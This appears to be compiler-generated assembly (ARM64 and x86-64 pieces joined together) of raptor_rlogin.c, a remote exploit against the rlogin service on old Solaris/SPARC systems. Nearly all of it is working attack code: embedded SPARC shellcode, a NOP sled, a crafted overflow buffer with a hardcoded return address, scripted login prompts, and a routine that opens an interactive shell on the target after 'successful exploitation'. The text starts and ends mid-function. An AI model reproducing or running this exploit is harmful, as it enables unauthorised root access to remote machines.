.p2align 2
_net_resolve: ; @net_resolve
.cfi_startproc
; %bb.0:
sub sp, sp, #48
.cfi_def_cfa_offset 48
stp x29, x30, [sp, #32] ; 16-byte Folded Spill
add x29, sp, #32
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
str x0, [sp, #16]
str wzr, [sp, #12]
ldr x0, [sp, #16]
bl _inet_addr
str w0, [sp, #12]
adds w8, w0, #1
cset w8, ne
tbnz w8, #0, LBB10_4
b LBB10_1
LBB10_1:
ldr x0, [sp, #16]
bl _gethostbyname
mov x8, x0
str x8, [sp]
subs x8, x0, #0
cset w8, ne
tbnz w8, #0, LBB10_3
b LBB10_2
LBB10_2:
stur wzr, [x29, #-4]
b LBB10_5
LBB10_3:
ldr x8, [sp]
ldr x8, [x8, #24]
ldr x1, [x8]
ldr x8, [sp]
ldrsw x2, [x8, #20]
add x0, sp, #12
mov x3, #4
bl ___memcpy_chk
b LBB10_4
LBB10_4:
ldr w8, [sp, #12]
stur w8, [x29, #-4]
b LBB10_5
LBB10_5:
ldur w0, [x29, #-4]
ldp x29, x30, [sp, #32] ; 16-byte Folded Reload
add sp, sp, #48
ret
.cfi_endproc
; -- End function
.section __DATA,__data
.globl _sc ; @sc
_sc:
.asciz "\224\020 \000!\013\330\232\240\024!n#\013\313\334\242\024ch\324#\277\374\342#\277\370\340#\277\364\220#\240\f\324#\277\360\320#\277\354\222#\240\024\202\020 ;\221\320 \b\202\020 \001\221\320 \b"
.globl _sparc_nop ; @sparc_nop
_sparc_nop:
.asciz "\220\033\200\016"
.section __TEXT,__cstring,cstring_literals
l___const.main.term: ; @__const.main.term
.asciz "vt100/9600"
l_.str: ; @.str
.asciz "%s\n%s\n\n"
l_.str.1: ; @.str.1
.asciz "raptor_rlogin.c - (r)login, Solaris/SPARC 2.5.1/2.6/7/8"
l_.str.2: ; @.str.2
.asciz "Copyright (c) 2004 Marco Ivaldi <[email protected]>"
l_.str.3: ; @.str.3
.asciz "dh:t:"
l_.str.4: ; @.str.4
.asciz "# connected to remote host: %s\n"
l_.str.5: ; @.str.5
.asciz "send"
l_.str.6: ; @.str.6
.asciz "error"
l_.str.7: ; @.str.7
.asciz "Timeout reached in rlogin session"
l_.str.8: ; @.str.8
.asciz "foo"
l_.str.9: ; @.str.9
.asciz "bar"
l_.str.10: ; @.str.10
.asciz "# performing dummy rlogin authentication\n"
l_.str.11: ; @.str.11
.asciz "assword: "
l_.str.12: ; @.str.12
.asciz "Timeout waiting for password prompt"
l_.str.13: ; @.str.13
.asciz "pass\n"
l_.str.14: ; @.str.14
.asciz "# waiting for login prompt\n"
l_.str.15: ; @.str.15
.asciz "ogin: "
l_.str.16: ; @.str.16
.asciz "Timeout waiting for login prompt"
l_.str.17: ; @.str.17
.asciz "# returning into 0x%08x\n"
l_.str.18: ; @.str.18
.asciz "# debug: press enter to continue"
l_.str.19: ; @.str.19
.asciz "%c"
l_.str.20: ; @.str.20
.asciz "foo "
l_.str.21: ; @.str.21
.asciz " "
l_.str.22: ; @.str.22
.asciz "a "
l_.str.23: ; @.str.23
.asciz " BBB"
l_.str.24: ; @.str.24
.asciz "BBB "
l_.str.25: ; @.str.25
.asciz "CCCCCCCCCCCCCCCC"
.section __TEXT,__const
l_.str.26: ; @.str.26
.asciz "\000\000\000 AAAA\n"
.section __TEXT,__cstring,cstring_literals
l_.str.27: ; @.str.27
.asciz "#"
l_.str.28: ; @.str.28
.asciz "\004"
l_.str.29: ; @.str.29
.asciz "\n"
l_.str.30: ; @.str.30
.asciz "# evil buffer sent, waiting for password prompt\n"
l_.str.31: ; @.str.31
.asciz "Most likely not vulnerable"
l_.str.32: ; @.str.32
.asciz "# password prompt received, waiting for shell\n"
l_.str.33: ; @.str.33
.asciz "# "
l_.str.34: ; @.str.34
.asciz "# shell prompt detected, successful exploitation\n\n"
l_.str.35: ; @.str.35
.asciz "%s: %s\n"
l_.str.36: ; @.str.36
.asciz "socket"
l_.str.37: ; @.str.37
.asciz "Can't bind a privileged port (must be root)"
l_.str.38: ; @.str.38
.asciz "Can't resolve hostname"
l_.str.39: ; @.str.39
.asciz "fcntl"
l_.str.40: ; @.str.40
.asciz "Can't connect to remote host"
l_.str.41: ; @.str.41
.asciz "select"
l_.str.42: ; @.str.42
.asciz "\"Da Bog da ti se mamica nahitavala s vragom po dvoristu!\" -- Bozica (Hrvatska)\n\n"
l_.str.43: ; @.str.43
.asciz "id;uname -a;uptime;\n"
l_.str.44: ; @.str.44
.asciz "Goodbye...\n"
l_.str.45: ; @.str.45
.asciz "write"
l_.str.46: ; @.str.46
.asciz "read"
l_.str.47: ; @.str.47
.asciz "usage: %s [-h host] [-t timeout] [-d]\n\n"
l_.str.48: ; @.str.48
.asciz "-h host\t\tdestination ip or fqdn\n"
l_.str.49: ; @.str.49
.asciz "-t timeout\tnet_read() timeout (default: %d)\n"
l_.str.50: ; @.str.50
.asciz "-d\t\tturn on debug mode\n\n"
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ## -- Begin function main
.p2align 4, 0x90
_main: ## @main
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $3104, %rsp ## imm = 0xC20
movl $0, -4(%rbp)
movl %edi, -8(%rbp)
movq %rsi, -16(%rbp)
leaq -3024(%rbp), %rax
movq %rax, -3032(%rbp)
movq $0, -3048(%rbp)
movq L___const.main.term(%rip), %rax
movq %rax, -3059(%rbp)
movw L___const.main.term+8(%rip), %ax
movw %ax, -3051(%rbp)
movb L___const.main.term+10(%rip), %al
movb %al, -3049(%rbp)
movl $10, -3080(%rbp)
movl $0, -3084(%rbp)
movq ___stderrp@GOTPCREL(%rip), %rax
movq (%rax), %rdi
leaq L_.str(%rip), %rsi
leaq L_.str.1(%rip), %rdx
leaq L_.str.2(%rip), %rcx
movb $0, %al
callq _fprintf
cmpl $2, -8(%rbp)
jge LBB0_2
## %bb.1:
movq -16(%rbp), %rax
movq (%rax), %rdi
callq _usage
LBB0_2:
jmp LBB0_3
LBB0_3: ## =>This Inner Loop Header: Depth=1
movl -8(%rbp), %edi
movq -16(%rbp), %rsi
leaq L_.str.3(%rip), %rdx
callq _getopt
## kill: def $al killed $al killed $eax
movb %al, -3033(%rbp)
movsbl %al, %eax
cmpl $-1, %eax
je LBB0_10
## %bb.4: ## in Loop: Header=BB0_3 Depth=1
movsbl -3033(%rbp), %eax
movl %eax, -3088(%rbp) ## 4-byte Spill
subl $100, %eax
je LBB0_7
jmp LBB0_73
LBB0_73: ## in Loop: Header=BB0_3 Depth=1
movl -3088(%rbp), %eax ## 4-byte Reload
subl $104, %eax
je LBB0_5
jmp LBB0_74
LBB0_74: ## in Loop: Header=BB0_3 Depth=1
movl -3088(%rbp), %eax ## 4-byte Reload
subl $116, %eax
je LBB0_6
jmp LBB0_8
LBB0_5: ## in Loop: Header=BB0_3 Depth=1
movq _optarg@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq %rax, -3048(%rbp)
jmp LBB0_9
LBB0_6: ## in Loop: Header=BB0_3 Depth=1
movq _optarg@GOTPCREL(%rip), %rax
movq (%rax), %rdi
callq _atoi
movl %eax, -3080(%rbp)
jmp LBB0_9
LBB0_7: ## in Loop: Header=BB0_3 Depth=1
movl $1, -3084(%rbp)
jmp LBB0_9
LBB0_8: ## in Loop: Header=BB0_3 Depth=1
movq -16(%rbp), %rax
movq (%rax), %rdi
callq _usage
LBB0_9: ## in Loop: Header=BB0_3 Depth=1
jmp LBB0_3
LBB0_10:
cmpq $0, -3048(%rbp)
jne LBB0_12
## %bb.11:
movq -16(%rbp), %rax
movq (%rax), %rdi
callq _usage
LBB0_12:
movq -3048(%rbp), %rdi
movl $513, %esi ## imm = 0x201
movl $10, %edx
callq _net_connect
movl %eax, -3064(%rbp)
movq ___stderrp@GOTPCREL(%rip), %rax
movq (%rax), %rdi
movq -3048(%rbp), %rdx
leaq L_.str.4(%rip), %rsi
movb $0, %al
callq _fprintf
movl $13, %edi
movl $1, %esi
callq _signal
leaq -3024(%rbp), %rdi
xorl %esi, %esi
movl $3000, %edx ## imm = 0xBB8
callq _memset
movl -3064(%rbp), %edi
leaq -3024(%rbp), %rsi
movl $1, %edx
xorl %ecx, %ecx
callq _send
cmpq $0, %rax
jge LBB0_14
## %bb.13:
callq ___error
movl (%rax), %edi
callq _strerror
movq %rax, %rsi
movl -3064(%rbp), %edx
leaq L_.str.5(%rip), %rdi
callq _fatalerr
LBB0_14:
movl -3064(%rbp), %edi
leaq -3024(%rbp), %rsi
movl -3080(%rbp), %ecx
movl $3000, %edx ## imm = 0xBB8
callq _net_read
cmpl $0, %eax
jge LBB0_16
## %bb.15:
movl -3064(%rbp), %edx
leaq L_.str.6(%rip), %rdi
leaq L_.str.7(%rip), %rsi
callq _fatalerr
LBB0_16:
movq -3032(%rbp), %rdi
leaq L_.str.8(%rip), %rsi
movl $3, %edx
movq $-1, %rcx
callq ___memcpy_chk
movq -3032(%rbp), %rax
addq $4, %rax
movq %rax, -3032(%rbp)
movq -3032(%rbp), %rdi
leaq L_.str.9(%rip), %rsi
movl $3, %edx
movq $-1, %rcx
callq ___memcpy_chk
movq -3032(%rbp), %rax
addq $4, %rax
movq %rax, -3032(%rbp)
movq -3032(%rbp), %rdi
leaq -3059(%rbp), %rsi
movl $11, %edx
movq $-1, %rcx
callq ___memcpy_chk
movq -3032(%rbp), %rax
addq $11, %rax
movq %rax, -3032(%rbp)
movq ___stderrp@GOTPCREL(%rip), %rax
movq (%rax), %rdi
leaq L_.str.10(%rip), %rsi
movb $0, %al
callq _fprintf
movl -3064(%rbp), %edi
leaq -3024(%rbp), %rsi
movq -3032(%rbp), %rdx
leaq -3024(%rbp), %rax
subq %rax, %rdx
xorl %ecx, %ecx
callq _send
cmpq $0, %rax
jge LBB0_18
## %bb.17:
callq ___error
movl (%rax), %edi
callq _strerror
movq %rax, %rsi
movl -3064(%rbp), %edx
leaq L_.str.5(%rip), %rdi
callq _fatalerr
LBB0_18:
movl $0, -3072(%rbp)
leaq -3024(%rbp), %rdi
xorl %esi, %esi
movl $3000, %edx ## imm = 0xBB8
callq _memset
LBB0_19: ## =>This Inner Loop Header: Depth=1
movl -3064(%rbp), %edi
leaq -3024(%rbp), %rsi
movl -3080(%rbp), %ecx
movl $3000, %edx ## imm = 0xBB8
callq _net_read
cmpl $0, %eax
je LBB0_23
## %bb.20: ## in Loop: Header=BB0_19 Depth=1
leaq -3024(%rbp), %rdi
leaq L_.str.11(%rip), %rsi
callq _strstr
cmpq $0, %rax
je LBB0_22
## %bb.21:
movl $1, -3072(%rbp)
jmp LBB0_23
LBB0_22: ## in Loop: Header=BB0_19 Depth=1
leaq -3024(%rbp), %rdi
xorl %esi, %esi
movl $3000, %edx ## imm = 0xBB8
callq _memset
jmp LBB0_19
LBB0_23:
cmpl $0, -3072(%rbp)
jne LBB0_25
## %bb.24:
movl -3064(%rbp), %edx
leaq L_.str.6(%rip), %rdi
leaq L_.str.12(%rip), %rsi
callq _fatalerr
LBB0_25:
movl -3064(%rbp), %edi
leaq L_.str.13(%rip), %rsi
movl $5, %edx
xorl %ecx, %ecx
callq _send
cmpq $0, %rax
jge LBB0_27
## %bb.26:
callq ___error
movl (%rax), %edi
callq _strerror
movq %rax, %rsi
movl -3064(%rbp), %edx
leaq L_.str.5(%rip), %rdi
callq _fatalerr
LBB0_27:
movl $0, -3072(%rbp)
leaq -3024(%rbp), %rdi
xorl %esi, %esi
movl $3000, %edx ## imm = 0xBB8
callq _memset
movq ___stderrp@GOTPCREL(%rip), %rax
movq (%rax), %rdi
leaq L_.str.14(%rip), %rsi
movb $0, %al
callq _fprintf
LBB0_28: ## =>This Inner Loop Header: Depth=1
movl -3064(%rbp), %edi
leaq -3024(%rbp), %rsi
movl -3080(%rbp), %ecx
movl $3000, %edx ## imm = 0xBB8
callq _net_read
cmpl $0, %eax
je LBB0_32
## %bb.29: ## in Loop: Header=BB0_28 Depth=1
leaq -3024(%rbp), %rdi
leaq L_.str.15(%rip), %rsi
callq _strstr
cmpq $0, %rax
je LBB0_31
## %bb.30:
movl $1, -3072(%rbp)
jmp LBB0_32
LBB0_31: ## in Loop: Header=BB0_28 Depth=1
leaq -3024(%rbp), %rdi
xorl %esi, %esi
movl $3000, %edx ## imm = 0xBB8
callq _memset
jmp LBB0_28
LBB0_32:
cmpl $0, -3072(%rbp)
jne LBB0_34
## %bb.33:
movl -3064(%rbp), %edx
leaq L_.str.6(%rip), %rdi
leaq L_.str.16(%rip), %rsi
callq _fatalerr
LBB0_34:
movq ___stderrp@GOTPCREL(%rip), %rax
movq (%rax), %rdi
leaq L_.str.17(%rip), %rsi
movl $160132, %edx ## imm = 0x27184
movb $0, %al
callq _fprintf
cmpl $0, -3084(%rbp)
je LBB0_36
## %bb.35:
leaq L_.str.18(%rip), %rdi
movb $0, %al
callq _printf
leaq L_.str.19(%rip), %rdi
leaq -3033(%rbp), %rsi
movb $0, %al
callq _scanf
LBB0_36:
leaq -3024(%rbp), %rdi
xorl %esi, %esi
movl $3000, %edx ## imm = 0xBB8
callq _memset
leaq -3024(%rbp), %rax
movq %rax, -3032(%rbp)
movq -3032(%rbp), %rdi
leaq L_.str.20(%rip), %rsi
movl $4, %edx
movq $-1, %rcx
callq ___memcpy_chk
movq -3032(%rbp), %rax
addq $4, %rax
movq %rax, -3032(%rbp)
movq -3032(%rbp), %rdi
xorl %esi, %esi
movl $160132, %edx ## imm = 0x27184
callq _set_val
movq -3032(%rbp), %rax
addq $4, %rax
movq %rax, -3032(%rbp)
movq -3032(%rbp), %rdi
leaq L_.str.21(%rip), %rsi
movl $1, %edx
movq $-1, %rcx
callq ___memcpy_chk
movq -3032(%rbp), %rax
addq $1, %rax
movq %rax, -3032(%rbp)
movl $0, -3068(%rbp)
LBB0_37: ## =>This Inner Loop Header: Depth=1
cmpl $60, -3068(%rbp)
jge LBB0_40
## %bb.38: ## in Loop: Header=BB0_37 Depth=1
movq -3032(%rbp), %rdi
leaq L_.str.22(%rip), %rsi
movl $2, %edx
movq $-1, %rcx
callq ___memcpy_chk
## %bb.39: ## in Loop: Header=BB0_37 Depth=1
movl -3068(%rbp), %eax
addl $1, %eax
movl %eax, -3068(%rbp)
movq -3032(%rbp), %rax
addq $2, %rax
movq %rax, -3032(%rbp)
jmp LBB0_37
LBB0_40:
movq -3032(%rbp), %rdi
leaq L_.str.23(%rip), %rsi
movl $4, %edx
movq $-1, %rcx
callq ___memcpy_chk
movq -3032(%rbp), %rax
addq $4, %rax
movq %rax, -3032(%rbp)
movl $0, -3068(%rbp)
LBB0_41: ## =>This Inner Loop Header: Depth=1
cmpl $398, -3068(%rbp) ## imm = 0x18E
jge LBB0_44
## %bb.42: ## in Loop: Header=BB0_41 Depth=1
movq -3032(%rbp), %rdi
leaq _sparc_nop(%rip), %rsi
movl $4, %edx
movq $-1, %rcx
callq ___memcpy_chk
## %bb.43: ## in Loop: Header=BB0_41 Depth=1
movl -3068(%rbp), %eax
addl $1, %eax
movl %eax, -3068(%rbp)
movq -3032(%rbp), %rax
addq $4, %rax
movq %rax, -3032(%rbp)
jmp LBB0_41
LBB0_44:
movq -3032(%rbp), %rdi
leaq _sc(%rip), %rsi
movl $64, %edx
callq _sc_copy
movl %eax, %ecx
movq -3032(%rbp), %rax
movslq %ecx, %rcx
addq %rcx, %rax
movq %rax, -3032(%rbp)
movq -3032(%rbp), %rdi
leaq L_.str.24(%rip), %rsi
movl $4, %edx
movq $-1, %rcx
callq ___memcpy_chk
movq -3032(%rbp), %rax
addq $4, %rax
movq %rax, -3032(%rbp)
movq -3032(%rbp), %rdi
leaq L_.str.25(%rip), %rsi
movl $16, %edx
movq $-1, %rcx
callq ___memcpy_chk
movq -3032(%rbp), %rax
addq $16, %rax
movq %rax, -3032(%rbp)
movq -3032(%rbp), %rdi
xorl %esi, %esi
movl $160132, %edx ## imm = 0x27184
callq _set_val
movq -3032(%rbp), %rax
addq $4, %rax
movq %rax, -3032(%rbp)
movq -3032(%rbp), %rdi
xorl %esi, %esi
movl $1, %edx
callq _set_val
movq -3032(%rbp), %rax
addq $4, %rax
movq %rax, -3032(%rbp)
movl $0, -3068(%rbp)
LBB0_45: ## =>This Inner Loop Header: Depth=1
cmpl $52, -3068(%rbp)
jge LBB0_48
## %bb.46: ## in Loop: Header=BB0_45 Depth=1
movq -3032(%rbp), %rdi
xorl %edx, %edx
movl %edx, %esi
callq _set_val
## %bb.47: ## in Loop: Header=BB0_45 Depth=1
movl -3068(%rbp), %eax
addl $1, %eax
movl %eax, -3068(%rbp)
movq -3032(%rbp), %rax
addq $4, %rax
movq %rax, -3032(%rbp)
jmp LBB0_45
LBB0_48:
movq -3032(%rbp), %rdi
leaq l_.str.26(%rip), %rsi
movl $9, %edx
movq $-1, %rcx
callq ___memcpy_chk
movq -3032(%rbp), %rax
addq $9, %rax
movq %rax, -3032(%rbp)
movq -3032(%rbp), %rax
leaq -3024(%rbp), %rcx
subq %rcx, %rax
## kill: def $eax killed $eax killed $rax
movl %eax, -3076(%rbp)
leaq -3024(%rbp), %rax
movq %rax, -3032(%rbp)
LBB0_49: ## =>This Inner Loop Header: Depth=1
cmpl $0, -3076(%rbp)
jle LBB0_56
## %bb.50: ## in Loop: Header=BB0_49 Depth=1
movq ___stderrp@GOTPCREL(%rip), %rax
movq (%rax), %rdi
leaq L_.str.27(%rip), %rsi
movb $0, %al
callq _fprintf
cmpl $256, -3076(%rbp) ## imm = 0x100
jle LBB0_52
## %bb.51: ## in Loop: Header=BB0_49 Depth=1
movl $256, %eax ## imm = 0x100
movl %eax, -3092(%rbp) ## 4-byte Spill
jmp LBB0_53
LBB0_52: ## in Loop: Header=BB0_49 Depth=1
movl -3076(%rbp), %eax
movl %eax, -3092(%rbp) ## 4-byte Spill
LBB0_53: ## in Loop: Header=BB0_49 Depth=1
movl -3092(%rbp), %eax ## 4-byte Reload
movl %eax, -3068(%rbp)
movl -3064(%rbp), %edi
movq -3032(%rbp), %rsi
movslq -3068(%rbp), %rdx
xorl %ecx, %ecx
callq _send
movl -3068(%rbp), %ecx
movl -3076(%rbp), %eax
subl %ecx, %eax
movl %eax, -3076(%rbp)
movl -3068(%rbp), %ecx
movq -3032(%rbp), %rax
movslq %ecx, %rcx
addq %rcx, %rax
movq %rax, -3032(%rbp)
cmpl $0, -3076(%rbp)
je LBB0_55
## %bb.54: ## in Loop: Header=BB0_49 Depth=1
movl -3064(%rbp), %edi
leaq L_.str.28(%rip), %rsi
movl $1, %edx
xorl %ecx, %ecx
callq _send
LBB0_55: ## in Loop: Header=BB0_49 Depth=1
movl $500000, %edi ## imm = 0x7A120
callq _usleep
jmp LBB0_49
LBB0_56:
movq ___stderrp@GOTPCREL(%rip), %rax
movq (%rax), %rdi
leaq L_.str.29(%rip), %rsi
movb $0, %al
callq _fprintf
movl $0, -3072(%rbp)
leaq -3024(%rbp), %rdi
xorl %esi, %esi
movl $3000, %edx ## imm = 0xBB8
callq _memset
movq ___stderrp@GOTPCREL(%rip), %rax
movq (%rax), %rdi
leaq L_.str.30(%rip), %rsi
movb $0, %al
callq _fprintf
LBB0_57: ## =>This Inner Loop Header: Depth=1
movl -3064(%rbp), %edi
leaq -3024(%rbp), %rsi
movl -3080(%rbp), %ecx
movl $3000, %edx ## imm = 0xBB8
callq _net_read
cmpl $0, %eax
je LBB0_61
## %bb.58: ## in Loop: Header=BB0_57 Depth=1
leaq -3024(%rbp), %rdi
leaq L_.str.11(%rip), %rsi
callq _strstr
cmpq $0, %rax
je LBB0_60
## %bb.59:
movl $1, -3072(%rbp)
jmp LBB0_61
LBB0_60: ## in Loop: Header=BB0_57 Depth=1
leaq -3024(%rbp), %rdi
xorl %esi, %esi
movl $3000, %edx ## imm = 0xBB8
callq _memset
jmp LBB0_57
LBB0_61:
cmpl $0, -3072(%rbp)
jne LBB0_63
## %bb.62:
movl -3064(%rbp), %edx
leaq L_.str.6(%rip), %rdi
leaq L_.str.31(%rip), %rsi
callq _fatalerr
LBB0_63:
movq ___stderrp@GOTPCREL(%rip), %rax
movq (%rax), %rdi
leaq L_.str.32(%rip), %rsi
movb $0, %al
callq _fprintf
movl -3064(%rbp), %edi
leaq L_.str.13(%rip), %rsi
movl $5, %edx
xorl %ecx, %ecx
callq _send
cmpq $0, %rax
jge LBB0_65
## %bb.64:
callq ___error
movl (%rax), %edi
callq _strerror
movq %rax, %rsi
movl -3064(%rbp), %edx
leaq L_.str.5(%rip), %rdi
callq _fatalerr
LBB0_65:
leaq -3024(%rbp), %rdi
xorl %esi, %esi
movl $3000, %edx ## imm = 0xBB8
callq _memset
movl $0, -3072(%rbp)
LBB0_66: ## =>This Inner Loop Header: Depth=1
movl -3064(%rbp), %edi
leaq -3024(%rbp), %rsi
movl -3080(%rbp), %ecx
movl $3000, %edx ## imm = 0xBB8
callq _net_read
cmpl $0, %eax
je LBB0_70
## %bb.67: ## in Loop: Header=BB0_66 Depth=1
leaq -3024(%rbp), %rdi
leaq L_.str.33(%rip), %rsi
callq _strstr
cmpq $0, %rax
je LBB0_69
## %bb.68:
movl $1, -3072(%rbp)
jmp LBB0_70
LBB0_69: ## in Loop: Header=BB0_66 Depth=1
leaq -3024(%rbp), %rdi
xorl %esi, %esi
movl $3000, %edx ## imm = 0xBB8
callq _memset
jmp LBB0_66
LBB0_70:
cmpl $0, -3072(%rbp)
jne LBB0_72
## %bb.71:
movl -3064(%rbp), %edx
leaq L_.str.6(%rip), %rdi
leaq L_.str.31(%rip), %rsi
callq _fatalerr
LBB0_72:
movq ___stderrp@GOTPCREL(%rip), %rax
movq (%rax), %rdi
leaq L_.str.34(%rip), %rsi
xorl %eax, %eax
movl %eax, -3096(%rbp) ## 4-byte Spill
callq _fprintf
movl -3064(%rbp), %edi
callq _shell
movl -3096(%rbp), %edi ## 4-byte Reload
callq _exit
.cfi_endproc
## -- End function
.globl _usage ## -- Begin function usage
.p2align 4, 0x90
_usage: ## @usage
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $32, %rsp
movq %rdi, -8(%rbp)
movq ___stderrp@GOTPCREL(%rip), %rax
movq %rax, -24(%rbp) ## 8-byte Spill
movq (%rax), %rdi
movq -8(%rbp), %rdx
leaq L_.str.47(%rip), %rsi
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movb %al, -9(%rbp) ## 1-byte Spill
callq _fprintf
movq -24(%rbp), %rcx ## 8-byte Reload
## kill: def $edx killed $eax
movb -9(%rbp), %al ## 1-byte Reload
movq (%rcx), %rdi
leaq L_.str.48(%rip), %rsi
callq _fprintf
movq -24(%rbp), %rcx ## 8-byte Reload
## kill: def $edx killed $eax
movb -9(%rbp), %al ## 1-byte Reload
movq (%rcx), %rdi
leaq L_.str.49(%rip), %rsi
movl $10, %edx
callq _fprintf
movq -24(%rbp), %rcx ## 8-byte Reload
## kill: def $edx killed $eax
movb -9(%rbp), %al ## 1-byte Reload
movq (%rcx), %rdi
leaq L_.str.50(%rip), %rsi
callq _fprintf
movl $1, %edi
callq _exit
.cfi_endproc
## -- End function
.globl _net_connect ## -- Begin function net_connect
.p2align 4, 0x90
_net_connect: ## @net_connect
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $288, %rsp ## imm = 0x120
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq %rax, -8(%rbp)
movq %rdi, -72(%rbp)
movl %esi, -76(%rbp)
movl %edx, -80(%rbp)
movl $2, %edi
movl $1, %esi
movl $6, %edx
callq _socket
movl %eax, -84(%rbp)
cmpl $0, %eax
jge LBB2_2
## %bb.1:
leaq L_.str.36(%rip), %rdi
callq _perror
movl $1, %edi
callq _exit
LBB2_2:
movb $2, -23(%rbp)
movl $0, -20(%rbp)
movl $1023, -88(%rbp) ## imm = 0x3FF
LBB2_3: ## =>This Inner Loop Header: Depth=1
cmpl $0, -88(%rbp)
jle LBB2_10
## %bb.4: ## in Loop: Header=BB2_3 Depth=1
## %bb.5: ## in Loop: Header=BB2_3 Depth=1
movl -88(%rbp), %eax
## kill: def $ax killed $ax killed $eax
movzwl %ax, %edi
callq __OSSwapInt16
movzwl %ax, %eax
movl %eax, -244(%rbp) ## 4-byte Spill
## %bb.6: ## in Loop: Header=BB2_3 Depth=1
movl -244(%rbp), %eax ## 4-byte Reload
movw %ax, -22(%rbp)
movl -84(%rbp), %edi
leaq -24(%rbp), %rsi
movl $16, %edx
callq _bind
cmpl $0, %eax
jne LBB2_8
## %bb.7:
jmp LBB2_10
LBB2_8: ## in Loop: Header=BB2_3 Depth=1
jmp LBB2_9
LBB2_9: ## in Loop: Header=BB2_3 Depth=1
movl -88(%rbp), %eax
addl $-1, %eax
movl %eax, -88(%rbp)
jmp LBB2_3
LBB2_10:
cmpl $0, -88(%rbp)
jne LBB2_12
## %bb.11:
movl -84(%rbp), %edx
leaq L_.str.6(%rip), %rdi
leaq L_.str.37(%rip), %rsi
callq _fatalerr
LBB2_12:
## %bb.13:
movl -76(%rbp), %eax
## kill: def $ax killed $ax killed $eax
movzwl %ax, %edi
callq __OSSwapInt16
movzwl %ax, %eax
movl %eax, -248(%rbp) ## 4-byte Spill
## %bb.14:
movl -248(%rbp), %eax ## 4-byte Reload
movw %ax, -22(%rbp)
movq -72(%rbp), %rdi
callq _net_resolve
movl %eax, -20(%rbp)
cmpl $0, %eax
jne LBB2_16
## %bb.15:
movl -84(%rbp), %edx
leaq L_.str.6(%rip), %rdi
leaq L_.str.38(%rip), %rsi
callq _fatalerr
LBB2_16:
movl -84(%rbp), %edi
movl $3, %esi
xorl %edx, %edx
movb $0, %al
callq _fcntl
movl %eax, -92(%rbp)
cmpl $0, %eax
jge LBB2_18
## %bb.17:
callq ___error
movl (%rax), %edi
callq _strerror
movq %rax, %rsi
movl -84(%rbp), %edx
leaq L_.str.39(%rip), %rdi
callq _fatalerr
LBB2_18:
movl -84(%rbp), %edi
movl -92(%rbp), %edx
orl $4, %edx
movl $4, %esi
movb $0, %al
callq _fcntl
cmpl $0, %eax
jge LBB2_20
## %bb.19:
callq ___error
movl (%rax), %edi
callq _strerror
movq %rax, %rsi
movl -84(%rbp), %edx
leaq L_.str.39(%rip), %rdi
callq _fatalerr
LBB2_20:
movl -84(%rbp), %edi
leaq -24(%rbp), %rsi
movl $16, %edx
callq _connect
cmpl $0, %eax
jne LBB2_24
## %bb.21:
movl -84(%rbp), %edi
movl -92(%rbp), %edx
movl $4, %esi
movb $0, %al
callq _fcntl
cmpl $0, %eax
jge LBB2_23
## %bb.22:
callq ___error
movl (%rax), %edi
callq _strerror
movq %rax, %rsi
movl -84(%rbp), %edx
leaq L_.str.39(%rip), %rdi
callq _fatalerr
LBB2_23:
movl -84(%rbp), %eax
movl %eax, -60(%rbp)
jmp LBB2_38
LBB2_24:
callq ___error
cmpl $36, (%rax)
je LBB2_26
## %bb.25:
movl -84(%rbp), %edx
leaq L_.str.6(%rip), %rdi
leaq L_.str.40(%rip), %rsi
callq _fatalerr
LBB2_26:
movslq -80(%rbp), %rax
movq %rax, -112(%rbp)
movl $0, -104(%rbp)
xorps %xmm0, %xmm0
movaps %xmm0, -272(%rbp) ## 16-byte Spill
movaps %xmm0, -128(%rbp)
movaps %xmm0, -144(%rbp)
movaps %xmm0, -160(%rbp)
movaps %xmm0, -176(%rbp)
movaps %xmm0, -192(%rbp)
movaps %xmm0, -208(%rbp)
movaps %xmm0, -224(%rbp)
movaps %xmm0, -240(%rbp)
movl -84(%rbp), %eax
movl %eax, -44(%rbp)
leaq -240(%rbp), %rax
movq %rax, -56(%rbp)
movl -44(%rbp), %ecx
movq -56(%rbp), %rax
movl %ecx, -32(%rbp)
movq %rax, -40(%rbp)
movq ___darwin_check_fd_set_overflow@GOTPCREL(%rip), %rax
testq %rax, %rax
je LBB2_28
jmp LBB2_27
LBB2_27:
movl -32(%rbp), %edi
movq -40(%rbp), %rsi
xorl %edx, %edx
callq ___darwin_check_fd_set_overflow
movl %eax, -28(%rbp)
jmp LBB2_29
LBB2_28:
movl $1, -28(%rbp)
LBB2_29:
cmpl $0, -28(%rbp)
je LBB2_31
## %bb.30:
movslq -44(%rbp), %rcx
andq $31, %rcx
movl $1, %eax
## kill: def $cl killed $rcx
shlq %cl, %rax
movl %eax, %edx
movq -56(%rbp), %rax
movslq -44(%rbp), %rcx
shrq $5, %rcx
orl (%rax,%rcx,4), %edx
movl %edx, (%rax,%rcx,4)
LBB2_31:
movl $1024, %edi ## imm = 0x400
xorl %eax, %eax
movl %eax, %ecx
leaq -240(%rbp), %rdx
leaq -112(%rbp), %r8
movq %rcx, %rsi
callq _select$1050
cmpl $0, %eax
jg LBB2_33
## %bb.32:
movl -84(%rbp), %edx
leaq L_.str.6(%rip), %rdi
leaq L_.str.40(%rip), %rsi
callq _fatalerr
LBB2_33:
movl $16, -96(%rbp)
movl -84(%rbp), %edi
leaq -24(%rbp), %rsi
leaq -96(%rbp), %rdx
callq _getpeername
cmpl $0, %eax
jge LBB2_35
## %bb.34:
movl -84(%rbp), %edx
leaq L_.str.6(%rip), %rdi
leaq L_.str.40(%rip), %rsi
callq _fatalerr
LBB2_35:
movl -84(%rbp), %edi
movl -92(%rbp), %edx
movl $4, %esi
movb $0, %al
callq _fcntl
cmpl $0, %eax
jge LBB2_37
## %bb.36:
callq ___error
movl (%rax), %edi
callq _strerror
